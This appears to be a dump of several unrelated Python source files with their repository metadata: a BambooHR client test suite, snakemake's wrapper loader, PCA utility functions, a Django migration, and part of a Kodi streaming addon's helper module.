            self.bamboo = PyBambooHR(subdomain='test', api_key='testingnotrealapikey')

    @httpretty.activate
    def test_get_time_off_requests(self):
        # Canned BambooHR response for GET /time_off/requests.
        body = [{"id": "1342", "employeeId": "4", "status": {"lastChanged": "2019-09-12", "lastChangedByUserId": "2369", "status": "approved"}, "name": "Charlotte Abbott", "start": "2019-05-30", "end": "2019-06-01", "created": "2019-09-11", "type": {"id": "78", "name": "Vacation", "icon": "palm-trees"}, "amount": {"unit": "hours", "amount": "24"}, "actions": {"view": True, "edit": True, "cancel": False, "approve": False, "deny": False, "bypass": False}, "dates": {"2019-05-30": "24"}, "notes": {"manager": "Home sick with the flu."}}]
        httpretty.register_uri(httpretty.GET,
                               "https://api.bamboohr.com/api/gateway.php/test/v1/time_off/requests",
                               body=dumps(body),
                               content_type="application/json")
        response = self.bamboo.get_time_off_requests()
        self.assertIsNotNone(response)
        self.assertTrue(len(response) > 0)
        self.assertEquals(response[0]['id'], '1342')
        return

    @httpretty.activate
    def test_get_time_off_policies(self):
        body = [{'id': '70', 'timeOffTypeId': '77', 'name': 'Testing Manual Policy', 'effectiveDate': None, 'type': 'manual'}]
        httpretty.register_uri(httpretty.GET,
                               "https://api.bamboohr.com/api/gateway.php/test/v1/meta/time_off/policies",
                               body=dumps(body),
                               content_type="application/json")
        response = self.bamboo.get_time_off_policies()
        self.assertIsNotNone(response)
        self.assertTrue(len(response) > 0)
        self.assertEquals(response[0]['id'], '70')
        return

    @httpretty.activate
    def test_get_time_off_types(self):
        # Note: the API nests types under a 'timeOffTypes' key; the client is
        # expected to unwrap it.
        body = {'timeOffTypes': [{'id': '78', 'name': 'Vacation', 'units': 'hours', 'color': None, 'icon': 'palm-trees'}]}
        httpretty.register_uri(httpretty.GET,
                               "https://api.bamboohr.com/api/gateway.php/test/v1/meta/time_off/types",
                               body=dumps(body),
                               content_type="application/json")
        response = self.bamboo.get_time_off_types()
        self.assertIsNotNone(response)
        self.assertTrue(len(response) > 0)
        self.assertEquals(response[0]['id'], '78')
        return

    @httpretty.activate
    def test_create_time_off_request(self):
        # Canned response echoing a newly created request (id 1675).
        body = {'id': '1675', 'employeeId': '111', 'start': '2040-02-01', 'end': '2040-02-02', 'created': '2019-12-24', 'status': {'status': 'requested', 'lastChanged': '2019-12-24 02:29:45', 'lastChangedByUserId': '2479'}, 'name': 'xdd xdd', 'type': {'id': '78', 'name': 'Vacation'}, 'amount': {'unit': 'hours', 'amount': '2'}, 'notes': {'employee': 'Going overseas with family', 'manager': 'Enjoy!'}, 'dates': {'2040-02-01': '1', '2040-02-02': '1'}, 'comments': [{'employeeId': '111', 'comment': 'Enjoy!', 'commentDate': '2019-12-24', 'commenterName': 'Test use'}], 'approvers': [{'userId': '2479', 'displayName': 'Test user', 'employeeId': '111', 'photoUrl': 'https://resources.bamboohr.com/employees/photos/initials.php?initials=testuser'}], 'actions': {'view': True, 'edit': True, 'cancel': True, 'approve': True, 'deny': True, 'bypass': True}, 'policyType': 'discretionary', 'usedYearToDate': 0, 'balanceOnDateOfRequest': 0}
        httpretty.register_uri(httpretty.PUT,
                               "https://api.bamboohr.com/api/gateway.php/test/v1/employees/111/time_off/request",
                               body=dumps(body),
                               content_type="application/json")
        data = {
            'status': 'requested',
            'employee_id': '111',
            'start': '2040-02-01',
            'end': '2040-02-02',
            'timeOffTypeId': '78',
            'amount': '2',
            'dates': [
                { 'ymd': '2040-02-01', 'amount': '1' },
                { 'ymd': '2040-02-02', 'amount': '1' }
            ],
            'notes': [
                { 'type': 'employee', 'text': 'Going overseas with family' },
                { 'type': 'manager', 'text': 'Enjoy!' }
            ]
        }
        response = self.bamboo.create_time_off_request(data)
        self.assertIsNotNone(response)
        self.assertEquals(response['id'], '1675')
        return

    @httpretty.activate
    def test_update_time_off_request_status(self):
        body = {'id': '1675', 'employeeId': '111', 'start': '2040-02-01', 'end': '2040-02-02', 'created': '2019-12-24', 'status': {'status': 'declined', 'lastChanged': '2019-12-24 02:29:45', 'lastChangedByUserId': '2479'}, 'name': 'xdd xdd', 'type': {'id': '78', 'name': 'Vacation'}, 'amount': {'unit': 'hours', 'amount': '2'}, 'notes': {'employee': 'Going overseas with family', 'manager': 'Enjoy!'}, 'dates': {'2040-02-01': '1', '2040-02-02': '1'}, 'comments': [{'employeeId': '111', 'comment': 'Enjoy!', 'commentDate': '2019-12-24', 'commenterName': 'Test use'}], 'approvers': [{'userId': '2479', 'displayName': 'Test user', 'employeeId': '111', 'photoUrl': 'https://resources.bamboohr.com/employees/photos/initials.php?initials=testuser'}], 'actions': {'view': True, 'edit': True, 'cancel': True, 'approve': True, 'deny': True, 'bypass': True}, 'policyType': 'discretionary', 'usedYearToDate': 0, 'balanceOnDateOfRequest': 0}
        httpretty.register_uri(httpretty.PUT,
                               "https://api.bamboohr.com/api/gateway.php/test/v1/time_off/requests/1675/status",
                               body=dumps(body),
                               content_type="application/json")
        data = {
            'status': 'declined',
            'note': 'Have fun!'
        }
        response = self.bamboo.update_time_off_request_status(body['id'] ,data)
        self.assertIsNotNone(response)
        self.assertTrue(response)
        return
"joevanbo@pm.me"
] | joevanbo@pm.me |
a7db7a35a129dddef9b0cb830716ebca4fed85be | 42366c1e36038bf879652b4f4c45c6105209a738 | /snakemake/wrapper.py | 52b1c95f9256a8db894ea389c38ad40fd4bec165 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | endrebak/snakemake_dev | e22989e40d475250a1f6e44421290b75dcaf6651 | 846cad1273de7cf43a25fc210174ce43dfd45a8a | refs/heads/master | 2021-01-13T16:01:30.593695 | 2016-12-14T08:21:22 | 2016-12-14T08:21:22 | 76,775,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | __author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "koester@jimmy.harvard.edu"
__license__ = "MIT"
import os
import posixpath
from snakemake.script import script
def is_script(path):
    """Return True when *path* points directly at a wrapper script file."""
    # endswith accepts a tuple of suffixes -- one call instead of an `or` chain.
    return path.endswith(("wrapper.py", "wrapper.R"))
def get_path(path, prefix=None):
    """Expand a repository-relative wrapper path into a full URL.

    Absolute locations ('http*' or 'file:') pass through untouched; anything
    else is prepended with *prefix*, defaulting to the official
    snakemake-wrappers repository.
    """
    if path.startswith("http") or path.startswith("file:"):
        return path
    if prefix is None:
        prefix = "https://bitbucket.org/snakemake/snakemake-wrappers/raw/"
    return prefix + path
def get_script(path, prefix=None):
    """Return the full URL of a wrapper's script file.

    Appends '/wrapper.py' when *path* does not already name a script.

    Bug fix: *prefix* was accepted but never forwarded to get_path(), so a
    custom wrapper prefix was silently ignored here.
    """
    path = get_path(path, prefix=prefix)
    if not is_script(path):
        path += "/wrapper.py"
    return path
def get_conda_env(path):
    """Return the URL of the environment.yaml that sits beside the wrapper."""
    location = get_path(path)
    if is_script(location):
        # Drop the script filename. URLs and posix paths share the same
        # separator, hence posixpath is used rather than os.path.
        location = posixpath.dirname(location)
    return location + "/environment.yaml"
def wrapper(path, input, output, params, wildcards, threads, resources, log, config, rulename, conda_env, prefix):
    """
    Load a wrapper from https://bitbucket.org/snakemake/snakemake-wrappers under
    the given path + wrapper.py and execute it through the generic script
    machinery (empty basedir, all rule context forwarded unchanged).
    """
    script(get_script(path, prefix=prefix), "", input, output, params, wildcards,
           threads, resources, log, config, rulename, conda_env)
| [
"johannes.koester@tu-dortmund.de"
] | johannes.koester@tu-dortmund.de |
5d0ed9ab08f7f7ae03317f6eb8e55318594ebfa4 | d4d6576e67ba1a935e28062835e56636fb7b6bfc | /priorgen/pca_utils.py | 05e43c552c5879146cf3f036c106616fa493ebaa | [
"MIT"
] | permissive | joshjchayes/PriorGen | caf80f49b4429345fd688c55d1eadd0a25df7cf8 | 228be0b06dca29ad2ad33ae216f494eaead6161f | refs/heads/master | 2023-05-26T00:51:14.875596 | 2021-06-07T14:58:26 | 2021-06-07T14:58:26 | 211,059,123 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,487 | py | '''
pca_utils.py
Module containing functions to run PCAs, and generate diagnostic plots
'''
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import numpy as np
def run_PCA(parameters, observables, n_components):
    '''
    Runs a principal component analysis to reduce dimensionality of
    observables.

    Parameters
    ----------
    parameters : array_like, shape (N, M)
        Physical parameter values for each training point (unused by the PCA
        itself; kept for interface symmetry with the other module functions).
    observables : array_like, shape (N, X)
        The observables associated with each of the parameters; 1D arrays
        whose entries are directly comparable across rows.
    n_components : int
        The number of principal components to keep.

    Returns
    -------
    pca : sklearn.decomposition.PCA
        The fitted scikit-learn PCA object.
    reduced_d_observables : array_like, shape(N, n_components)
        The observables projected onto the principal components.
    '''
    decomposition = PCA(n_components=n_components)
    # fit() returns the estimator itself, so fit then transform separately.
    decomposition.fit(observables)
    projected = decomposition.transform(observables)
    return decomposition, projected
def pca_plot(parameters, observables, n_components, save=True,
             save_path='PCA_plot.pdf'):
    '''
    Produces a plot of the explained variance of the first n_components
    principal components, along with a cumulative variance

    Parameters
    ----------
    parameters : array_like, shape (N, M)
        The physical parameter values for each point we are training the
        ML classifier on. N is the number of points, whilst M is the
        physical value for each parameter. These are all assumed to be in
        the same order. We assume that there are M variables in the model,
        and that none of them are constants.
    observables : array_like, shape (N, X)
        The observables associated with each of the parameters. We assume
        that the observables are 1D arrays where each entry is directly
        comparable. For example, it could be F(t), but where each entry is
        at the same value of t.
    n_components : int
        The number of principal components to keep
    save : bool, optional:
        If True, will save the output figure to save_path. Default is True.
    save_path : str, optional
        If save is True, this is the path that the figures will
        be saved to. Default is 'PCA_plot.pdf'.

    Returns
    -------
    fig : matplotlib.Figure
        The pca plot
    '''
    pca, _ = run_PCA(parameters, observables, n_components)

    variance = pca.explained_variance_ratio_
    cumulative_variance = np.cumsum(variance).round(4)

    # Two stacked panels sharing the x axis (principal-component index).
    fig, ax = plt.subplots(2,1, sharex=True)

    # Top panel: per-component explained variance on a log scale.
    ax[0].bar(np.arange(n_components), variance, label='Associated variance')
    #ax[0].set_xlabel('Principal component')
    ax[0].set_ylabel('Fractional variance')
    ax[0].set_yscale('log')

    # Bottom panel: running total of explained variance.
    ax[1].plot(np.arange(n_components), cumulative_variance, 'r', label='Cumulative variance')
    ax[1].set_xlabel('Principal component')
    ax[1].set_ylabel('Cumulative variance')
    ax[1].margins(x=0.01)

    fig.tight_layout()
    fig.subplots_adjust(hspace=0)

    if save:
        fig.savefig(save_path)

    return fig
def find_required_components(parameters, observables, variance):
    '''
    Calculates the number of principal components required for reduced
    dimensionality obserables to contain a given fraction of explained variance

    Parameters
    ----------
    parameters : array_like, shape (N, M)
        The physical parameter values for each point we are training the
        ML classifier on. N is the number of points, whilst M is the
        physical value for each parameter. These are all assumed to be in
        the same order. We assume that there are M variables in the model,
        and that none of them are constants.
    observables : array_like, shape (N, X)
        The observables associated with each of the parameters. We assume
        that the observables are 1D arrays where each entry is directly
        comparable. For example, it could be F(t), but where each entry is
        at the same value of t.
    variance : float
        The fraction of explained variance you want the principal components
        to contain

    Returns
    -------
    n_components : int
        The smallest number of principal comonents required to contain the
        specified fraction of explained variance
    '''
    if not 0 <= variance < 1:
        raise ValueError('variance must be between 0 and 1')

    # run PCA and keep all components
    pca, _ = run_PCA(parameters, observables, None)

    cumulative_variance = np.cumsum(pca.explained_variance_ratio_)

    # Indices where the cumulative explained variance first meets the target.
    candidates = np.where(cumulative_variance >= variance)[0]
    if len(candidates) == 0:
        # Floating-point rounding can leave the cumulative sum marginally
        # below the target even with every component kept; in that case all
        # components are required (previously this raised an IndexError).
        n_PCs = len(cumulative_variance)
    else:
        # +1 because indices start at 0 but component counts start at 1.
        n_PCs = int(candidates[0]) + 1

    if n_PCs > 30:
        print('WARNING: {} principal components are required - this may lead to slow run times.'.format(n_PCs))

    return n_PCs
| [
"joshjchayes@gmail.com"
] | joshjchayes@gmail.com |
ccd9a83891610d364cd5354c03ff16bc5b6dcaf1 | 87367fe2ee0203a88fb911e476818d7b17ec932f | /shop/migrations/0010_auto_20200322_0621.py | a03c0f2483ce917a205d6d0cdde9ff5c9c20b983 | [] | no_license | brianmurim9/ecommerce | 08808d11c785d91b8afeed19dbf7ee9af9411fa3 | 7dbc9ba5d80771e799f55fb2ced51cd0d2c37d1f | refs/heads/main | 2023-02-22T20:55:31.714612 | 2021-01-16T06:13:33 | 2021-01-16T06:13:33 | 330,094,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | # Generated by Django 3.0.4 on 2020-03-22 13:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated by Django (makemigrations, 2020-03-22).

    Re-points OrderItem.user at the swappable AUTH_USER_MODEL with CASCADE
    deletion.  Migration files should not be hand-edited beyond comments.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('shop', '0009_auto_20200322_0616'),
    ]

    operations = [
        migrations.AlterField(
            model_name='orderitem',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"noreply@github.com"
] | noreply@github.com |
f3ed0316d367ac2d8180e59a9ef4e265df2eb72b | d78dfc5089717fc242bbd7097f507d811abb4260 | /French/plugin.video.fr.filmsdefrance/streamcomplet_common.py | 01bb111cb943894548d6f78bf38f215525777056 | [] | no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 69,201 | py | ### ############################################################################################################
### #
### # Author: # The Highway
### # Description: # Common File
### #
### ############################################################################################################
### ############################################################################################################
### Imports ###
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
import os,sys,string,StringIO,logging,random,array,time,datetime,re
import urllib,urllib2,htmllib
from streamcomplet_config import *
#import urlresolver
#import copy
#try: import json
#except ImportError: import simplejson as json
#try: import StorageServer
#except: import storageserverdummy as StorageServer
#cache = StorageServer.StorageServer(plugin_id)
try: from addon.common.net import Net
except:
try: from t0mm0.common.net import Net
except:
try: from c_t0mm0_common_net import Net
except: pass
try: from addon.common.addon import Addon
except:
try: from t0mm0.common.addon import Addon
except:
try: from c_t0mm0_common_addon import Addon
except: pass
#try: from sqlite3 import dbapi2 as sqlite; print "Loading sqlite3 as DB engine"
#except: from pysqlite2 import dbapi2 as sqlite; print "Loading pysqlite2 as DB engine"
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import cHiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
UsedLanguages=ps('UsedLanguages');
### ############################################################################################################
__plugin__=ps('__plugin__'); __authors__=ps('__authors__'); __credits__=ps('__credits__');
### ############################################################################################################
##### Addon / Plugin Basic Setup #####
_addon_id=ps('_addon_id'); _plugin_id=ps('_addon_id');
_addon=Addon(ps('_addon_id'), sys.argv); addon=_addon;
_plugin=xbmcaddon.Addon(id=ps('_addon_id'));
try:
try: import StorageServer as StorageServer
except:
try: import c_StorageServer as StorageServer
except:
try: import storageserverdummy as StorageServer
except:
try: import c_storageserverdummy as StorageServer
except: pass
cache=StorageServer.StorageServer(ps('_addon_id'))
except: pass
##### Paths #####
#_database_name=ps('_database_name')
#_database_file=os.path.join(xbmc.translatePath("special://database"),ps('_database_name')+'.db');
#DB=_database_file;
_domain_url=ps('_domain_url'); _du=ps('_domain_url');
_addonPath =xbmc.translatePath(_plugin.getAddonInfo('path'))
_artPath =xbmc.translatePath(os.path.join(_addonPath,ps('_addon_path_art')))
_datapath =xbmc.translatePath(_addon.get_profile());
_artIcon =_addon.get_icon();
_artFanart =_addon.get_fanart()
##### Important Functions with some dependencies #####
def addstv(id,value=''): _addon.addon.setSetting(id=id,value=value) ## Save Settings
def addst(r,s=''): return _addon.get_setting(r) ## Get Settings
def addpr(r,s=''): return _addon.queries.get(r,s) ## Get Params
def tfalse(r, d=False): ## Get True / False
    """Map a settings string to a boolean.

    Accepts the usual truthy/falsy spellings case-insensitively; returns the
    default *d* when the string is not recognised.
    """
    value = r.lower()
    if value in ('true', 't', 'y', '1', 'yes'):
        return True
    if value in ('false', 'f', 'n', '0', 'no'):
        return False
    return d
def tfalse_old(r,d=False): ## Get True / False
    """Legacy strict variant of tfalse(): only 'true'/'false' (any case) are
    recognised; everything else returns the default *d*.  Kept for reference;
    superseded by tfalse() above.
    """
    if (r.lower()=='true' ): return True
    elif (r.lower()=='false'): return False
    else: return d
def art(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,f+fe)) ### for Making path+filename+ext data for Art Images. ###
def artp(f,fe='.png'): return art(f,fe)
def artj(f,fe='.jpg'): return art(f,fe)
def ROart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def ROartp(f,fe='.png'): return ROart(f,fe)
def ROartj(f,fe='.jpg'): return ROart(f,fe)
def FRart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def FRartp(f,fe='.png'): return ROart(f,fe)
def FRartj(f,fe='.jpg'): return ROart(f,fe)
##### Settings #####
_setting={};
_setting['enableMeta'] = _enableMeta =tfalse(addst("enableMeta"))
_setting['debug-enable']= _debugging =tfalse(addst("debug-enable"));
_setting['debug-show'] = _shoDebugging =tfalse(addst("debug-show"))
debugging=_debugging
##### Variables #####
_default_section_=ps('default_section');
net=Net();
BASE_URL=ps('_domain_url');
### ############################################################################################################
### ############################################################################################################
def eod(): _addon.end_of_directory()
def notification(header="", message="", sleep=5000 ): xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i)" % ( header, message, sleep ) )
def myNote(header='',msg='',delay=5000,image='http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/US_99_%281961%29.svg/40px-US_99_%281961%29.svg.png'): _addon.show_small_popup(title=header,msg=msg,delay=delay,image=image)
def cFL( t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t+'[/COLOR]' ### For Coloring Text ###
def cFL_(t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t[0:1]+'[/COLOR]'+t[1:] ### For Coloring Text (First Letter-Only) ###
def WhereAmI(t): ### for Writing Location Data to log file ###
if (_debugging==True): print 'Where am I: '+t
def deb(s,t): ### for Writing Debug Data to log file ###
if (_debugging==True): print s+': '+t
def debob(t): ### for Writing Debug Object to log file ###
if (_debugging==True): print t
def nolines(t):
    """Collapse *t* onto a single line by removing all line-break characters."""
    # splitlines() already strips \r, \n and the other unicode line
    # boundaries, so joining the pieces replaces the original
    # concatenate-in-a-loop (quadratic) plus redundant replace() calls.
    return ''.join(t.splitlines())
def isPath(path): return os.path.exists(path)
def isFile(filename): return os.path.isfile(filename)
def getFileExtension(filename):
    """Return the text after the last '.' in *filename*, or '' if no dot."""
    # rpartition splits on the LAST dot, mirroring the original rfind logic
    # (note: '.hidden' yields 'hidden', same as before).
    head, dot, tail = filename.rpartition('.')
    return tail if dot else ''
def get_immediate_subdirectories(directory):
    """Return the names (not paths) of *directory*'s direct subdirectories."""
    subdirs = []
    for entry in os.listdir(directory):
        if os.path.isdir(os.path.join(directory, entry)):
            subdirs.append(entry)
    return subdirs
def findInSubdirectory(filename, subdirectory=''):
    """Return the full path of *filename* found anywhere under *subdirectory*
    (defaults to the addon directory when empty).

    Raises IOError when the file cannot be found.  (The original code raised
    a bare string, which is a TypeError at runtime on Python 3 and was
    deprecated on Python 2.)
    """
    path = subdirectory if subdirectory else _addonPath
    for root, _, names in os.walk(path):
        if filename in names:
            return os.path.join(root, filename)
    raise IOError('File not found: %s' % filename)
def get_xbmc_os():
    """Return the OS name from the environment; "unknown" if the lookup fails.

    Note the %OS% variable may be unset on non-Windows platforms, in which
    case None is returned (same as the original behaviour).
    """
    result = "unknown"
    try:
        result = os.environ.get('OS')
    except:
        pass
    return result
def get_xbmc_version():
    """Return the raw XBMC build-version string, or 'Unknown' if unavailable."""
    # The unused `rev_re` regex from the original has been removed; revision
    # parsing lives in get_xbmc_revision().
    try:
        xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
    except Exception:
        xbmc_version = 'Unknown'
    return xbmc_version
def get_xbmc_revision():
    """Parse the numeric SVN revision out of the XBMC build-version label.

    Returns 0 (and logs the raw version string) when no revision can be
    extracted.
    """
    rev_pattern = re.compile('r(\d+)')
    try:
        version_label = xbmc.getInfoLabel('System.BuildVersion')
    except:
        version_label = 'Unknown'
    try:
        revision = int(rev_pattern.search(version_label).group(1))
        deb("addoncompat.py: XBMC Revision", revision)
    except:
        revision = 0
        deb("addoncompat.py: XBMC Revision not available - Version String", version_label)
    return revision
def _SaveFile(path,data):
file=open(path,'w')
file.write(data)
file.close()
def _OpenFile(path):
    """Return the contents of `path`, or '' when the file does not exist.

    Uses ``with`` so the handle is closed even when read() raises; the
    original leaked the handle on a failed read.
    """
    deb('File', path)
    if os.path.isfile(path):  ## File found.
        deb('Found', path)
        with open(path, 'r') as f:
            return f.read()
    else:
        return ''  ## File not found.
def _CreateDirectory(dir_path):
dir_path = dir_path.strip()
if not os.path.exists(dir_path): os.makedirs(dir_path)
def _get_dir(mypath, dirname): #...creates sub-directories if they are not found.
subpath = os.path.join(mypath, dirname)
if not os.path.exists(subpath): os.makedirs(subpath)
return subpath
def askSelection(option_list=None, txtHeader=''):
    """Pop up an XBMC selection dialog.

    Args:
        option_list: list of labels to choose from; None/empty aborts.
        txtHeader: dialog heading text.

    Returns:
        The selected index (-1 when the user cancels the dialog), or
        None when there is nothing to select.

    The mutable default argument ``option_list=[]`` was replaced with
    ``None``; callers are unaffected (an empty list is still rejected).
    """
    if not option_list:
        debob('askSelection() >> option_list is empty')
        return None
    dialogSelect = xbmcgui.Dialog()
    index = dialogSelect.select(txtHeader, option_list)
    return index
def iFL(t):
    """Wrap `t` in XBMC italic markup."""
    return ''.join(('[I]', t, '[/I]'))
def bFL(t):
    """Wrap `t` in XBMC bold markup."""
    return ''.join(('[B]', t, '[/B]'))
def _FL(t,c,e=''): ### For Custom Text Tags ###
if (e==''): d=''
else: d=' '+e
return '['+c.upper()+d+']'+t+'[/'+c.upper()+']'
def aSortMeth(sM,h=int(sys.argv[1])):
    # Register a sort method for the current plugin listing.
    # NOTE(review): the handle default int(sys.argv[1]) is evaluated ONCE at
    # import time, not per call -- fine for a single plugin invocation, but
    # confirm before importing this module outside a plugin run.
    xbmcplugin.addSortMethod(handle=h, sortMethod=sM)
def set_view(content='none',view_mode=50,do_sort=False):
    """Apply a content type and (optionally) a forced view mode to the listing.

    Args:
        content: xbmcplugin content type ('movies', 'episodes', ...);
            the sentinel 'none' skips setContent.
        view_mode: skin view id, applied when the "auto-view" setting is on.
        do_sort: accepted for caller compatibility; unused here.

    Bug fix: the original compared strings with ``is not 'none'``, which
    only works because CPython interns short literals; replaced with ``!=``.
    """
    deb('content type: ',str(content))
    deb('view mode: ',str(view_mode))
    h=int(sys.argv[1])
    if content != 'none': xbmcplugin.setContent(h, content)
    if (tfalse(addst("auto-view"))==True): xbmc.executebuiltin("Container.SetViewMode(%s)" % str(view_mode))
def showkeyboard(txtMessage="",txtHeader="",passwordField=False):
    """Open the XBMC on-screen keyboard and return the entered text.

    Returns False when the user cancels.  A literal 'None' default text is
    treated as empty input.  `passwordField=True` masks the typed text.
    """
    if txtMessage == 'None':
        txtMessage = ''
    kb = xbmc.Keyboard(txtMessage, txtHeader, passwordField)
    kb.doModal()
    if not kb.isConfirmed():
        return False
    return kb.getText()
def ParseDescription(plot): ## Cleans up the dumb number stuff thats ugly.
    """Sanitize a plot/description string scraped from HTML.

    Replaces a hard-coded set of HTML-entity / mojibake sequences, strips
    unresolved ``&#...;`` numeric entities, and finally removes every
    character in the 127-255 range so only plain ASCII remains.

    NOTE(review): the ``is not ''`` string comparisons below rely on
    CPython literal interning; ``!=`` would be the robust spelling.
    NOTE(review): the extra replacement table is only applied when the
    'my-language' setting matches UsedLanguages[1] -- presumably the
    non-English locale; confirm against the settings definition.
    """
    if ("&" in plot): plot=plot.replace('&' ,'&')#&#x27;
    if (" " in plot): plot=plot.replace(' ' ," ")
    if ("’" in plot): plot=plot.replace('’' ,"'")
    if ("–" in plot): plot=plot.replace("–","-") #unknown
    if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
        #if addst('my-language','French').lower()=='French':
        if ('&#' in plot) and (';' in plot):
            if ("–" in plot): plot=plot.replace("–","-") #unknown
            if ("‘" in plot): plot=plot.replace("‘","'")
            if ("’" in plot): plot=plot.replace("’","'")
            if ("“" in plot): plot=plot.replace('“','"')
            if ("”" in plot): plot=plot.replace('”','"')
            if ("×" in plot): plot=plot.replace('×' ,'x')
            if ("'" in plot): plot=plot.replace(''' ,"'")
            if ("ô" in plot): plot=plot.replace('ô' ,"o")
            if ("·" in plot): plot=plot.replace('·' ,"-")
            if ("û" in plot): plot=plot.replace('û' ,"u")
            if ("à" in plot): plot=plot.replace('à' ,"a")
            if ("ƥ" in plot): plot=plot.replace('ƥ',"")
            if ("é" in plot): plot=plot.replace('é' ,"e")
            if ("â" in plot): plot=plot.replace('â' ,"a")
            if ("&" in plot): plot=plot.replace('&' ,"&")
        #if ("a" in plot): plot=plot.replace('a' ,"a")
        ##if (chr(239) in plot): plot=plot.replace(chr(239) ,"'")
        #zz=[[u'\xe2','a']] #[[196,'a'],[196,'a'],[196,'a'],[196,'a'],[196,'a']]
        #for c1,c2 in zz:
        #    if (chr(c1) in plot): plot=plot.replace(chr(c1) ,c2)
    ##plot=plot.replace(chr('0x92'),"'")
    # Strip any numeric HTML entities that survived the table above.
    if ('&#' in plot) and (';' in plot):
        try: matches=re.compile('&#(.+?);').findall(plot)
        except: matches=''
        if (matches is not ''):
            for match in matches:
                if (match is not '') and (match is not ' ') and ("&#"+match+";" in plot):
                    try: plot=plot.replace("&#"+match+";" ,"")
                    #try: plot=plot.replace("&#"+match+";" ,""+match)
                    except: pass
    try: matches=re.compile('\\x([0-9a-zA-Z][0-9a-zA-Z])').findall(plot)
    except: matches=''
    #if (matches is not ''):
    #    for match in matches:
    #        if (match is not '') and (match is not ' ') and ("\\x"+match+"" in plot):
    #            try: plot=plot.replace("\\x"+match+"","")
    #            #try: plot=plot.replace("\\x"+match+"",""+match)
    #            except: pass
    #if ("\xb7" in plot): plot=plot.replace('\xb7' ,"-")
    #if ('&#' in plot) and (';' in plot): plot=unescape_(plot)
    # Final pass: drop every non-ASCII byte (127-255).
    for i in xrange(127,256):
        try: plot=plot.replace(chr(i),"")
        except: pass
    return plot
def unescape_(s):
    """Decode HTML character entities in `s` via htmllib (Python 2 stdlib only)."""
    p = htmllib.HTMLParser(None)
    p.save_bgn()  # start buffering parsed character data
    p.feed(s)
    return p.save_end()  # return the buffered, entity-decoded text
def messupText(t,_html=False,_ende=False,_a=False,Slashes=False):
    """Apply a configurable set of best-effort cleanups to scraped text.

    Flags (each step is wrapped in try/except and silently skipped on error):
        _html:   unescape HTML entities and run ParseDescription().
        _ende:   re-encode the text as UTF-8 (branching on the 'my-language'
                 setting; both branches currently do the same encode -- the
                 commented-out alternatives record past experiments).
        _a:      run the addon helper's decode()/unescape().
        Slashes: replace underscores with spaces.
    """
    if (_html==True):
        try: t=HTMLParser.HTMLParser().unescape(t)
        except: pass
        try: t=ParseDescription(t)
        except: pass
    if (_ende==True):
        try:
            if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
                #if not addst('my-language','French').lower()=='French':
                t=t.encode('utf8');
                #t=t.encode('utf8','ignore');
                #t=t.encode('ascii','ignore');
                #t=t.decode('iso-8859-1')
            else:
                #t=t.encode('utf8','ignore'); t=t.decode('cp1250')
                #t=t.encode('utf8'); t=t.decode('cp1250')
                #t=t.encode('ascii','ignore'); t=t.decode('iso-8859-1')
                #t=unicodedata.normalize('NFKD', unicode(t)).encode('ascii','ignore')
                #t=t.encode('ascii','ignore'); t=t.decode('cp1250')
                #t=t.encode('ascii','replace'); t=t.decode('cp1250')
                #t=t.encode('ascii','strict'); t=t.decode('cp1250')
                #t=t.encode('ascii','xmlcharrefreplace'); t=t.decode('cp1250')
                #t=t.decode('cp1250')
                t=t.encode('utf8');
                #t=t.encode('utf8','ignore');
                #t=t
        except: pass
    if (_a==True):
        try: t=_addon.decode(t); t=_addon.unescape(t)
        except: pass
    if (Slashes==True):
        try: t=t.replace( '_',' ')
        except: pass
    #t=t.replace("text:u","")
    return t
def nURL(url,method='get',form_data={},headers={},html='',proxy='',User_Agent='',cookie_file='',load_cookie=False,save_cookie=False):
    """HTTP fetch helper built on the t0mm0 `net` object.

    Args:
        url: target URL; '' returns '' immediately.
        method: 'get' | 'post' | 'head' (anything else returns `html`).
        form_data: POST payload (only used for 'post').
        html: fallback body returned when the request raises.
        proxy: proxy URL, applied only when longer than 9 characters.
        User_Agent: overrides the default UA from settings when non-empty.
        cookie_file / load_cookie / save_cookie: optional cookie handling.

    Two known site-error pages trigger an OK dialog before returning.
    NOTE(review): form_data/headers are mutable defaults -- harmless here
    only because they are never mutated.
    """
    if url=='': return ''
    dhtml=''+html  # keep a copy of the caller's fallback body
    if len(User_Agent) > 0: net.set_user_agent(User_Agent)
    else: net.set_user_agent(ps('User-Agent'))
    if len(proxy) > 9: net.set_proxy(proxy)
    if (len(cookie_file) > 0) and (load_cookie==True): net.set_cookies(cookie_file)
    if method.lower()=='get':
